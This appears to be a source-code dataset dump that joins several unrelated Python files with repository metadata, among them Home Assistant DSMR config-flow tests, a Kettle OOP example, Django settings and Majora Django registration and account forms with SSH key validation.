if age >= int(j[0]) and age <= int(j[1]):
employeeAgeDictionary[j[0] + '-' + j[1]].append(name)
for i in employeeAgeDictionary:
if employeeAgeDictionary[i] != []:
newDict[i] = employeeAgeDictionary[i]
return newDict
# print(findCuisine('restaurants.txt', 'Mexican'))
# print(restaurantFilter('restaurants.txt'))
# print(createDirectory('restaurants.txt','output.txt'))
# print(extraHours('employees.csv', 40))
# print(seniorStaffAverage('employees.csv', 2019))
# rangeList = ["20-29", "30-39"]
# print(ageDict('employees.csv', rangeList))
# print(ageDict('employees.csv', ['0-18', '18-19']))
| [
"[email protected]"
] | |
8498795049bcc029a2c71a310a2525dd63063293 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_commoners.py | ba7756247f776e21069b78a695be616e5b343ce5 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#calss header
class _COMMONERS():
def __init__(self,):
self.name = "COMMONERS"
self.definitions = commoner
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['commoner']
| [
"[email protected]"
] | |
cc560822ef2d48813402158877c3e00ff38a8fb7 | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /tests/components/dsmr/test_config_flow.py | 8ad7c7214a3c8c39e9e6f051c5814db922a12dea | [
"Apache-2.0"
] | permissive | home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | 2023-08-31T15:41:06.299469 | 2023-08-31T14:50:53 | 2023-08-31T14:50:53 | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | 2023-09-14T21:50:15 | 2013-09-17T07:29:48 | Python | UTF-8 | Python | false | false | 19,514 | py | """Test the DSMR config flow."""
import asyncio
from itertools import chain, repeat
import os
from unittest.mock import DEFAULT, AsyncMock, MagicMock, patch, sentinel
import serial
import serial.tools.list_ports
from homeassistant import config_entries, data_entry_flow
from homeassistant.components.dsmr import DOMAIN, config_flow
from homeassistant.core import HomeAssistant
from tests.common import MockConfigEntry
SERIAL_DATA = {"serial_id": "12345678", "serial_id_gas": "123456789"}
SERIAL_DATA_SWEDEN = {"serial_id": None, "serial_id_gas": None}
def com_port():
"""Mock of a serial port."""
port = serial.tools.list_ports_common.ListPortInfo("/dev/ttyUSB1234")
port.serial_number = "1234"
port.manufacturer = "Virtual serial port"
port.device = "/dev/ttyUSB1234"
port.description = "Some serial port"
return port
async def test_setup_network(
hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup network."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Network"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_network"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "10.10.0.1",
"port": 1234,
"dsmr_version": "2.2",
},
)
await hass.async_block_till_done()
entry_data = {
"host": "10.10.0.1",
"port": 1234,
"dsmr_version": "2.2",
"protocol": "dsmr_protocol",
}
assert result["type"] == "create_entry"
assert result["title"] == "10.10.0.1:1234"
assert result["data"] == {**entry_data, **SERIAL_DATA}
async def test_setup_network_rfxtrx(
hass: HomeAssistant,
dsmr_connection_send_validate_fixture,
rfxtrx_dsmr_connection_send_validate_fixture,
) -> None:
"""Test we can setup network."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Network"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_network"
assert result["errors"] == {}
# set-up DSMRProtocol to yield no valid telegram, this will retry with RFXtrxDSMRProtocol
protocol.telegram = {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "10.10.0.1",
"port": 1234,
"dsmr_version": "2.2",
},
)
await hass.async_block_till_done()
entry_data = {
"host": "10.10.0.1",
"port": 1234,
"dsmr_version": "2.2",
"protocol": "rfxtrx_dsmr_protocol",
}
assert result["type"] == "create_entry"
assert result["title"] == "10.10.0.1:1234"
assert result["data"] == {**entry_data, **SERIAL_DATA}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup serial."""
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "2.2"},
)
await hass.async_block_till_done()
entry_data = {
"port": port.device,
"dsmr_version": "2.2",
"protocol": "dsmr_protocol",
}
assert result["type"] == "create_entry"
assert result["title"] == port.device
assert result["data"] == {**entry_data, **SERIAL_DATA}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial_rfxtrx(
com_mock,
hass: HomeAssistant,
dsmr_connection_send_validate_fixture,
rfxtrx_dsmr_connection_send_validate_fixture,
) -> None:
"""Test we can setup serial."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
# set-up DSMRProtocol to yield no valid telegram, this will retry with RFXtrxDSMRProtocol
protocol.telegram = {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "2.2"},
)
await hass.async_block_till_done()
entry_data = {
"port": port.device,
"dsmr_version": "2.2",
"protocol": "rfxtrx_dsmr_protocol",
}
assert result["type"] == "create_entry"
assert result["title"] == port.device
assert result["data"] == {**entry_data, **SERIAL_DATA}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_5L(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup serial."""
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "5L"},
)
await hass.async_block_till_done()
entry_data = {
"port": port.device,
"dsmr_version": "5L",
"protocol": "dsmr_protocol",
"serial_id": "12345678",
"serial_id_gas": "123456789",
}
assert result["type"] == "create_entry"
assert result["title"] == port.device
assert result["data"] == entry_data
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_5S(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup serial."""
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {"port": port.device, "dsmr_version": "5S"}
)
await hass.async_block_till_done()
entry_data = {
"port": port.device,
"dsmr_version": "5S",
"protocol": "dsmr_protocol",
"serial_id": None,
"serial_id_gas": None,
}
assert result["type"] == "create_entry"
assert result["title"] == port.device
assert result["data"] == entry_data
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_Q3D(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup serial."""
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "Q3D"},
)
await hass.async_block_till_done()
entry_data = {
"port": port.device,
"dsmr_version": "Q3D",
"protocol": "dsmr_protocol",
"serial_id": "12345678",
"serial_id_gas": None,
}
assert result["type"] == "create_entry"
assert result["title"] == port.device
assert result["data"] == entry_data
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial_manual(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test we can setup serial with manual entry."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": "Enter Manually", "dsmr_version": "2.2"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial_manual_path"
assert result["errors"] is None
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {"port": "/dev/ttyUSB0"}
)
await hass.async_block_till_done()
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"protocol": "dsmr_protocol",
}
assert result["type"] == "create_entry"
assert result["title"] == "/dev/ttyUSB0"
assert result["data"] == {**entry_data, **SERIAL_DATA}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial_fail(
com_mock, hass: HomeAssistant, dsmr_connection_send_validate_fixture
) -> None:
"""Test failed serial connection."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
# override the mock to have it fail the first time and succeed after
first_fail_connection_factory = AsyncMock(
return_value=(transport, protocol),
side_effect=chain([serial.serialutil.SerialException], repeat(DEFAULT)),
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch(
"homeassistant.components.dsmr.config_flow.create_dsmr_reader",
first_fail_connection_factory,
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "2.2"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {"base": "cannot_connect"}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial_timeout(
com_mock,
hass: HomeAssistant,
dsmr_connection_send_validate_fixture,
rfxtrx_dsmr_connection_send_validate_fixture,
) -> None:
"""Test failed serial connection."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
(
connection_factory,
transport,
rfxtrx_protocol,
) = rfxtrx_dsmr_connection_send_validate_fixture
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
first_timeout_wait_closed = AsyncMock(
return_value=True,
side_effect=chain([asyncio.TimeoutError], repeat(DEFAULT)),
)
protocol.wait_closed = first_timeout_wait_closed
first_timeout_wait_closed = AsyncMock(
return_value=True,
side_effect=chain([asyncio.TimeoutError], repeat(DEFAULT)),
)
rfxtrx_protocol.wait_closed = first_timeout_wait_closed
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {"port": port.device, "dsmr_version": "2.2"}
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {"base": "cannot_communicate"}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial_wrong_telegram(
com_mock,
hass: HomeAssistant,
dsmr_connection_send_validate_fixture,
rfxtrx_dsmr_connection_send_validate_fixture,
) -> None:
"""Test failed telegram data."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
(
rfxtrx_connection_factory,
transport,
rfxtrx_protocol,
) = rfxtrx_dsmr_connection_send_validate_fixture
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
protocol.telegram = {}
rfxtrx_protocol.telegram = {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "2.2"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {"base": "cannot_communicate"}
async def test_options_flow(hass: HomeAssistant) -> None:
"""Test options flow."""
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
entry = MockConfigEntry(
domain=DOMAIN,
data=entry_data,
unique_id="/dev/ttyUSB0",
)
entry.add_to_hass(hass)
result = await hass.config_entries.options.async_init(entry.entry_id)
assert result["type"] == "form"
assert result["step_id"] == "init"
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
"time_between_update": 15,
},
)
with patch(
"homeassistant.components.dsmr.async_setup_entry", return_value=True
), patch("homeassistant.components.dsmr.async_unload_entry", return_value=True):
assert result["type"] == data_entry_flow.FlowResultType.CREATE_ENTRY
await hass.async_block_till_done()
assert entry.options == {"time_between_update": 15}
def test_get_serial_by_id_no_dir() -> None:
"""Test serial by id conversion if there's no /dev/serial/by-id."""
p1 = patch("os.path.isdir", MagicMock(return_value=False))
p2 = patch("os.scandir")
with p1 as is_dir_mock, p2 as scan_mock:
res = config_flow.get_serial_by_id(sentinel.path)
assert res is sentinel.path
assert is_dir_mock.call_count == 1
assert scan_mock.call_count == 0
def test_get_serial_by_id() -> None:
"""Test serial by id conversion."""
p1 = patch("os.path.isdir", MagicMock(return_value=True))
p2 = patch("os.scandir")
def _realpath(path):
if path is sentinel.matched_link:
return sentinel.path
return sentinel.serial_link_path
p3 = patch("os.path.realpath", side_effect=_realpath)
with p1 as is_dir_mock, p2 as scan_mock, p3:
res = config_flow.get_serial_by_id(sentinel.path)
assert res is sentinel.path
assert is_dir_mock.call_count == 1
assert scan_mock.call_count == 1
entry1 = MagicMock(spec_set=os.DirEntry)
entry1.is_symlink.return_value = True
entry1.path = sentinel.some_path
entry2 = MagicMock(spec_set=os.DirEntry)
entry2.is_symlink.return_value = False
entry2.path = sentinel.other_path
entry3 = MagicMock(spec_set=os.DirEntry)
entry3.is_symlink.return_value = True
entry3.path = sentinel.matched_link
scan_mock.return_value = [entry1, entry2, entry3]
res = config_flow.get_serial_by_id(sentinel.path)
assert res is sentinel.matched_link
assert is_dir_mock.call_count == 2
assert scan_mock.call_count == 2
| [
"[email protected]"
] | |
da3148eda0d51e3d5d6c53ed95cca7d8fd467839 | 75ce5b7fee397fe4e67ed15a58f4cd42e0f8de9f | /PythonMasterclass/OOP/oop.py | 8f9a4c844627350a4a88b461ec85cf8bb780bbce | [] | no_license | lukbast/stuff | 7fd03b7e035394802c307682a25621dfd667960b | 160e1d77d1b592fac099b9c7139fb4e2f7f8dbbe | refs/heads/main | 2023-08-06T21:39:55.334812 | 2021-09-23T17:37:47 | 2021-09-23T17:37:47 | 409,684,114 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | class Kettle(object):
power_source = 'electricity'
def __init__(self, make, price):
self.make = make
self.price = price
self.on = False
def turn_on(self):
self.on = True
philips = Kettle('Philips', 420)
kenwood = Kettle('Kenwood', 9.99)
kenwood.price = 666
print(kenwood.price)
kenwood.turn_on()
print(kenwood.on)
print('Kettle: {0.make}, for {0.price}, isOn: {0.on}'.format(kenwood))
# In Python you can add new attributes to an object like this
kenwood.color = 'magenta'
print(kenwood.color)
# DUN DUN DUN
print(philips.power_source)
print(kenwood.power_source)
kenwood.power_source = 'hamsters'
print(kenwood.power_source)
print(philips.power_source)
Kettle.power_source = 'Atomic'
print(kenwood.power_source)
print(philips.power_source)
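# Note (added): assigning kenwood.power_source created an instance attribute
# that shadows the class attribute, so changing Kettle.power_source afterwards
# is visible through philips (which still reads the class attribute) but not
# through kenwood.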
| [
"[email protected]"
] | |
3e64394d796a026c719123cf7ef89bcb82365121 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sdssj_120408.22+153609.7/sdB_sdssj_120408.22+153609.7_lc.py | 45c4a65ca1273ffe327210776740e7315636db7c | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[181.03425,15.602694], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_sdssj_120408.22+153609.7/sdB_sdssj_120408.22+153609.7_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
8d062e70c1250414eb462291082fec9b977fc54e | 80199ed4dd0d072140160a785932c35952105b19 | /miller/api/serializers/__init__.py | c25a1b7e375a9e4c48c04feabf33e4b2f2d6833d | [] | no_license | C2DH/miller | 7d90bb6bdfec0ab37cea80480c783dc850e33d19 | 5263a9e392249f6515e74dd45b92957bd6e9e1a7 | refs/heads/miller-v2 | 2023-06-01T20:51:37.167091 | 2023-05-15T13:48:03 | 2023-05-15T13:48:03 | 89,341,967 | 1 | 3 | null | 2023-05-15T13:46:16 | 2017-04-25T09:23:29 | Python | UTF-8 | Python | false | false | 41 | py | from .story import CreateStorySerializer
| [
"[email protected]"
] | |
ce9e81e2b51bb97642a79f8b467a2770571ede66 | eea1be5dbac7fa10167eae167eb6712e3937f53a | /voidcoin/settings/dev.py | 70ec86d6e913a5df701dd36881e48c14a73f0cf7 | [] | no_license | chidimo/Voidcoin | 40962e46661b2a7106bd8e60d0830c3b9629b8fa | 227c160dfa671818522781aab013f2d1fcb098a9 | refs/heads/develop | 2022-12-09T17:40:26.294425 | 2019-07-04T08:32:20 | 2019-07-04T08:32:20 | 135,197,447 | 5 | 2 | null | 2022-12-08T02:08:45 | 2018-05-28T18:45:19 | Python | UTF-8 | Python | false | false | 1,964 | py | from .base import *
DEBUG = True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'voidcoin',
'USER': 'postgres',
'PASSWORD': config('DEV_DB_PASSWORD'),
'HOST': 'localhost',
'PORT': 5432
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
INSTALLED_APPS += ['debug_toolbar']
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'debug_toolbar.panels.cache.CachePanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
]
MIDDLEWARE += [
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
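# Note (added): django-debug-toolbar only renders for client addresses listed
# in INTERNAL_IPS (e.g. INTERNAL_IPS = ["127.0.0.1"]), which this settings
# module does not define; add it if the toolbar does not appear.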
# LOGGING = {
# 'version': 1,
# 'disable_existing_loggers': False,
# 'formatters': {
# 'verbose': {
# 'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
# 'datefmt' : "%d/%b/%Y %H:%M:%S"
# },
# 'simple': {
# 'format': '%(levelname)s %(message)s'
# },
# },
# 'handlers': {
# 'file': {
# 'level': 'DEBUG',
# 'class': 'logging.FileHandler',
# 'filename': os.path.join(BASE_DIR, 'voidcoin_dev.log'),
# 'formatter': 'verbose'
# },
# },
# 'loggers': {
# 'django': {
# 'handlers':['file'],
# 'propagate': True,
# 'level':'DEBUG',
# },
# 'MYAPP': {
# 'handlers': ['file'],
# 'level': 'DEBUG',
# },
# }
# }
| [
"[email protected]"
] | |
3f4d4b142fe225bb204064c1dbfc8857e1c172fe | 93a613f09d564a1d45ecc01b54b73745ce2850b7 | /majora2/forms.py | 6adcc2da009d17ffe9c9c4e06700d45aa3e7b5d8 | [] | no_license | pythseq/majora | fa17c77fa8a916c688fd2b40744d768dd851b99b | 40b918d32b4061cddee5f7279f97e70eb894623d | refs/heads/master | 2022-12-23T20:09:41.233844 | 2020-09-28T18:18:42 | 2020-09-28T18:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,308 | py | import datetime
from django import forms
from django.contrib.auth.models import User
from django.db.models import Q
from django.utils import timezone
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Fieldset, Submit, Row, Column
from crispy_forms.bootstrap import FormActions
from .account_views import generate_username
from . import models
from . import fixed_data
import re
from sshpubkeys import SSHKey
def majora_clean_ssh_key(ssh_key):
if ssh_key:
ssh_key = "".join(ssh_key.splitlines()).strip()
key = SSHKey(ssh_key)
try:
key.parse()
except Exception as e:
raise forms.ValidationError("Unable to decode your key. Please ensure this is your public key and has been entered correctly.")
if key.key_type != b'ssh-ed25519':
raise forms.ValidationError("This system accepts ed25519 keys only.")
return ssh_key
class CreditForm(forms.Form):
#TODO samstudio8: There is a condition where the max_length can be overrun as we append the site name, reduce this field maxlen by 4+1 to account for the general case of a 4 letter side code and :
credit_code = forms.CharField(max_length=19, required=True, help_text="A short string to refer to this credit list when uploading metadata. This need not match an existing site name, or barcode. Note that this will automatically be prefixed by your site identifier.")
lab_name = forms.CharField(max_length=512, required=True, label="Originating lab name(s)", help_text="The name or names of originating labs you would like to credit")
lab_addr = forms.CharField(max_length=512, required=True, label="Originating lab address(es)", help_text="Use the broadest address that encompasses all the originating labs")
lab_list = forms.CharField(max_length=2048, required=False, widget=forms.Textarea(attrs={"rows": 5}), label="Author list")
delete = forms.BooleanField(required=False, label="Delete", help_text="Tick this to remove this Credit from your Institute")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Fieldset("Credit",
Row(
Column('credit_code', css_class="form-group col-md-4 mb-0"),
css_class="form-row",
),
Row(
Column('lab_name', css_class="form-group col-md-6 mb-0"),
Column('lab_addr', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
Row(
Column('lab_list', css_class="form-group col-md-12 mb-0"),
css_class="form-row",
),
Row(
Column('delete', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
),
FormActions(
Submit('save', 'Save'),
css_class="text-right",
)
)
class InstituteForm(forms.Form):
name = forms.CharField(max_length=100, disabled=True, required=False)
code = forms.CharField(max_length=10, disabled=True, required=False)
gisaid_opted = forms.BooleanField(required=False, label="GISAID Opt-in", help_text="Check this box to opt-in to COG-UK automated submissions to GISAID")
gisaid_user = forms.CharField(max_length=100, required=False, label="GISAID username", help_text="Submissions will be sent on behalf of this user")
gisaid_mail = forms.EmailField(required=False, label="E-mail address", help_text="E-mail address to share with GISAID curators")
gisaid_lab_name = forms.CharField(max_length=512, required=False, label="Originating lab name(s)", help_text="The name or names of originating labs you would like to credit")
gisaid_lab_addr = forms.CharField(max_length=512, required=False, label="Originating lab address(es)", help_text="Use the broadest address that encompasses all the originating labs")
gisaid_list = forms.CharField(max_length=2048, required=False, widget=forms.Textarea(attrs={"rows": 5}), label="Author list")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Fieldset("Institute",
Row(
Column('code', css_class="form-group col-md-2 mb-0"),
Column('name', css_class="form-group col-md-10 mb-0"),
css_class="form-row",
),
Row(
Column('gisaid_opted', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("GISAID: User",
Row(
Column('gisaid_user', css_class="form-group col-md-6 mb-0"),
Column('gisaid_mail', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("GISAID: Originating Lab",
Row(
Column('gisaid_lab_name', css_class="form-group col-md-6 mb-0"),
Column('gisaid_lab_addr', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("GISAID: Authors",
'gisaid_list'
),
FormActions(
Submit('save', 'Save'),
css_class="text-right",
)
)
def clean(self):
cleaned_data = super().clean()
if cleaned_data.get("gisaid_opted", False):
for field in ["gisaid_user", "gisaid_mail", "gisaid_lab_name", "gisaid_lab_addr", "gisaid_list"]:
if not cleaned_data.get(field):
self.add_error(field, "Required if opting-in to GISAID submissions")
if cleaned_data.get("gisaid_user"):
if not cleaned_data.get("gisaid_opted"):
self.add_error("gisaid_opted", "Check this box to opt-in to GISAID submissions")
class AccountForm(forms.Form):
username = forms.CharField(max_length=150, disabled=True, required=False, help_text="You cannot change your username")
first_name = forms.CharField(max_length=30)
last_name = forms.CharField(max_length=150)
email = forms.EmailField()
organisation = forms.ModelChoiceField(queryset=models.Institute.objects.exclude(code__startswith="?").order_by("code"), disabled=True, required=False, help_text="You cannot change your organisation", to_field_name="code")
    ssh_key = forms.CharField(widget=forms.Textarea(attrs={"rows": 5}), label="SSH Public Key.<br/>This system accepts ed25519 keys only. To generate one, run this command: <code>ssh-keygen -o -a 100 -t ed25519</code>", help_text="If you do not need access to CLIMB servers over SSH to upload sequence data or access resources, you can leave this blank. You can add an SSH key later but will need to notify us.", required=False)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Fieldset("User",
Row(
Column('username', css_class="form-group col-md-6 mb-0"),
Column('email', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
),
Fieldset("Name",
Row(
Column('first_name', css_class="form-group col-md-6 mb-0"),
Column('last_name', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("Organisation",
Row(
Column('organisation', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("SSH Key",
'ssh_key'
),
FormActions(
Submit('save', 'Update'),
css_class="text-right",
)
)
def clean(self):
cleaned_data = super().clean()
def clean_ssh_key(self):
return majora_clean_ssh_key(self.cleaned_data.get("ssh_key"))
class RegistrationForm(forms.Form):
username = forms.CharField(max_length=150, disabled=True, required=False)
first_name = forms.CharField(max_length=30)
last_name = forms.CharField(max_length=150)
email = forms.EmailField()
password1 = forms.CharField(widget=forms.PasswordInput(), label="Password", min_length=8)
password2 = forms.CharField(widget=forms.PasswordInput(), label="Confirm password", min_length=8)
organisation = forms.ModelChoiceField(queryset=models.Institute.objects.exclude(code__startswith="?").order_by("code"))
    ssh_key = forms.CharField(widget=forms.Textarea(attrs={"rows": 5}), label="SSH Public Key.<br/>This system accepts ed25519 keys only. To generate one, run this command: <code>ssh-keygen -o -a 100 -t ed25519</code>", help_text="If you do not need access to CLIMB servers over SSH to upload sequence data or access resources, you can leave this blank. You can add an SSH key later but will need to notify us.", required=False)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Fieldset("User",
Row(
Column('username', css_class="form-group col-md-6 mb-0"),
Column('email', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
Row(
Column('password1', css_class="form-group col-md-6 mb-0"),
Column('password2', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("Name",
Row(
Column('first_name', css_class="form-group col-md-6 mb-0"),
Column('last_name', css_class="form-group col-md-6 mb-0"),
